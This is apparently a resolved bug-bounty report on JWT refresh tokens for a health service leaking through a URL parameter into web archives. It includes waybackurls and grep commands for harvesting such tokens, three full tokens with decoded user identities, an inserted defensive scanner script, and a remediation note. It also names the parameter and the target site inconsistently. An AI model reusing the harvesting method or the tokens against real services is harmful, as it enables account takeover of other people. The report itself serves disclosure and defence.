Information disclosure from URL parameter "access" leads to Account Takeover
Medium
Vulnerability Details
## Summary:
The "sessions" URL parameter contains a JWT, and archived URLs carrying it can be fetched with the "waybackurls" tool.
## PoC
- Fetch archived URLs on ring.com using waybackurls with this command:
```
echo "app.khealth.com" | waybackurls > app.khealth.com
```
- Filter the URLs for JWT-looking values (every JWT header starts with "eyJ") with grep:
```
cat app.khealth.com | grep "eyJ"
```
- From the matches you can harvest JWT tokens, for example:
{F2748658}
## Validate JWT Token
- Token 1 :
```
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZGVudGl0eSI6IjY1MGFkNDE5MGY4ZDkxODU3YzgxZTRiZSIsInRlbmFudCI6ImtoZWFsdGgiLCJleHAiOjE3Mjc4OTU1MDEsImZyZXNoIjpmYWxzZSwiaWF0IjoxNjk2MzU5NTAxLCJqdGkiOiI0MzJlNDVhZC1hNzUxLTQzOTUtOGU4YS04OTNmNjViODQ4N2EiLCJuYmYiOjE2OTYzNTk1MDEsInR5cGUiOiJyZWZyZXNoIn0.E85o25rJ5t1k9HzuZa4dCJq6l_WKvWaKCVbH2jAHvvaZXPKmV1C04dsbPRFEgsCxuV6XV8hP99G8f20fR3SMDNDrqwHojWDGt75BYf9F33x_J_GKbZMtWkmat7_qqdu8lSvPhHRNl8GBwKqegus0yTtS1PLH0GHDsvaBRmgFdCNiAol9H45Yok9YnVoKgEPZr2_Gz96NsjYqm-Iv5OaV4oBjtmgQTQJ569vHwDA04Dj64mAIOP_wdASYiOrCgMtltsEwwJYSym2YyAC7t7ITenuSm1p8OH6cU10XTRGnfACo-LjinAnM-UpHkrZEJ53wFrQTS8J9Aqjhk_YTzv-nuQ
```
After decoding:
```
{
"identity": "650ad4190f8d91857c81e4be",
"tenant": "khealth",
"exp": 1727895501,
"fresh": false,
"iat": 1696359501,
"jti": "432e45ad-a751-4395-8e8a-893f65b8487a",
"nbf": 1696359501,
"type": "refresh"
}
```
Using the JWT token in a GET request to api-2.khealth.io/api/v2/home:
{F2748674}
- Token 2 :
```
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZGVudGl0eSI6IjY1MGJlYmRiYjdlODVkMzExMmUyMzg1MCIsInRlbmFudCI6ImtoZWFsdGgiLCJleHAiOjE3Mjc4OTUzNDIsImZyZXNoIjpmYWxzZSwiaWF0IjoxNjk2MzU5MzQyLCJqdGkiOiJmMzM1NTcyYS0yMmIyLTRkMTYtYWZjMy1iNTQ2YzY0NGFlOGEiLCJuYmYiOjE2OTYzNTkzNDIsInR5cGUiOiJyZWZyZXNoIn0.LJwe3su6W5IFyFJFyHIgOGCnBc6SxhzlWOwhsIMYgagMl79ahJTsgQ95cS6sqHmbzt76mtyi8KYqVbzEwQLUle0asWjtsIMa9GLngYKYqylP7k5UIqae4nLAp_m2I75SVCr3iyinY7QJVOTxwNKfm59bq1-0lVy-G1mKVZ5KThL_4OzV_PN9Jf5kYSXEoH1r4zY92gI2EVk-_Tcbj47l1OlYnN4d-58UQP1TjdDptTA2FPeFD4AdX8-PIwv7imeVgAKE4cNn1sVew6Rl0GiPqnK_EwoJUL1BuYXXnn-zDR7sbIqTuB4quIkjpCq8S4cRJYudoTYcmN_rRKorpeYAKA
```
After decoding:
```
{
"identity": "650bebdbb7e85d3112e23850",
"tenant": "khealth",
"exp": 1727895342,
"fresh": false,
"iat": 1696359342,
"jti": "f335572a-22b2-4d16-afc3-b546c644ae8a",
"nbf": 1696359342,
"type": "refresh"
}
```
Using the JWT token in a GET request to api-2.khealth.io/api/v2/home:
{F2748699}
- Token 3 :
```
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZGVudGl0eSI6IjY1MWM2NTkwZmJiY2Q2ZDdkNDY2NjQwMyIsInRlbmFudCI6ImtoZWFsdGgiLCJleHAiOjE3Mjc4OTU4MjYsImZyZXNoIjpmYWxzZSwiaWF0IjoxNjk2MzU5ODI2LCJqdGkiOiI3OWRjYWNkYS00OGJhLTQxZDctYmMxYi1mYjk1NjM1MDBiM2MiLCJuYmYiOjE2OTYzNTk4MjYsInR5cGUiOiJyZWZyZXNoIn0.P6cyASY1H6KFg6LS35Pdx4Z-t9Mjp-BR6e_h5jvj4m3nDpta4hrw3rjmCaPyTN-_keSoZxTexu5QaOYS64xhCeBt1Wr8o3HSwQicVjCIX3izwcofhgP3DrebdqIAxN0GUNsrOD72XWFCoL0VWRA4V8z6D46MWVFpqkOua0DGabQm5bMpJ_Fw-tGeRdwUnl0M8nOTU_PlQOWy2D_R2clK6OTj2gBLyxhzeHIr7xCkB16D07L0qzNQQIti_o49uQRAE2PiMkVJVX41y8LQ8SmyNToFOEwZsToa7VJaL5_hqLKTZEF3OTAY0Q2j5kNxZWHwLC2uwXrPF7bKXS3fGLruJQ
```
After decoding:
```
{
"identity": "651c6590fbbcd6d7d4666403",
"tenant": "khealth",
"exp": 1727895826,
"fresh": false,
"iat": 1696359826,
"jti": "79dcacda-48ba-41d7-bc1b-fb9563500b3c",
"nbf": 1696359826,
"type": "refresh"
}
```
Using the JWT token in a GET request to api-2.khealth.io/api/v2/home:
{F2748716}
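As an added defender-side check (not part of the original report): a small scanner that flags JWTs carried in URL query parameters, such as the "sessions" parameter above, and decodes their claims without verifying the signature so a responder can see the subject, the token type and whether the token is still valid. It is meant to run over your own access logs or URL inventories before they reach a public archive; the sample token and URL are constructed, and the identity and signature in them are placeholders.

```python
import base64
import json
import re
import time
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# Three base64url segments; a JSON header ('{"') always encodes to the prefix "eyJ".
JWT_RE = re.compile(r"^eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$")

def b64url_decode(segment: str) -> bytes:
    """Decode one base64url segment, restoring the '=' padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def decode_unverified(token: str) -> dict:
    """Header and payload claims only. The signature is deliberately not checked:
    this inventories what leaked, it does not authenticate anything."""
    header, payload, _signature = token.split(".")
    return {"header": json.loads(b64url_decode(header)),
            "payload": json.loads(b64url_decode(payload))}

def find_jwts_in_url(url: str, now: Optional[int] = None) -> list:
    """One finding per query parameter whose value is a JWT, with the claims a
    responder needs for triage: subject, token type, expiry, expired-or-not."""
    now = int(time.time()) if now is None else now
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if not JWT_RE.match(value):
            continue
        try:
            claims = decode_unverified(value)["payload"]
        except ValueError:  # covers bad base64, bad UTF-8 and bad JSON
            continue
        exp = claims.get("exp")
        findings.append({"param": name,
                         "identity": claims.get("identity", claims.get("sub")),
                         "type": claims.get("type"), "exp": exp,
                         "expired": exp is not None and exp <= now})
    return findings

def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Constructed sample token (not real): the report's claim shape, placeholder identity/signature.
SAMPLE_TOKEN = ".".join([
    _b64url(json.dumps({"typ": "JWT", "alg": "RS256"}).encode()),
    _b64url(json.dumps({"identity": "000000000000000000000000", "tenant": "example",
                        "exp": 1727895501, "iat": 1696359501, "type": "refresh"}).encode()),
    "placeholder-signature"])
SAMPLE_URL = "https://app.example.com/login?sessions=" + SAMPLE_TOKEN + "&lang=en"
```

Calling `find_jwts_in_url(SAMPLE_URL)` reports the "sessions" parameter as a refresh token for the placeholder identity; the same function can be mapped over each line of a URL list or access log.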
## Recommendation
Remove JWT tokens from request parameters: modify the application code so that JWT tokens are never placed in URL query parameters, where they end up in browser history, proxy and server logs, Referer headers and public web archives. Transmit them instead in HTTP headers (for example an Authorization header) or in the body of POST requests.
## Impact
Account Takeover
Report Stats
- Report ID: 2193454
- State: Closed
- Substate: resolved
- Upvotes: 3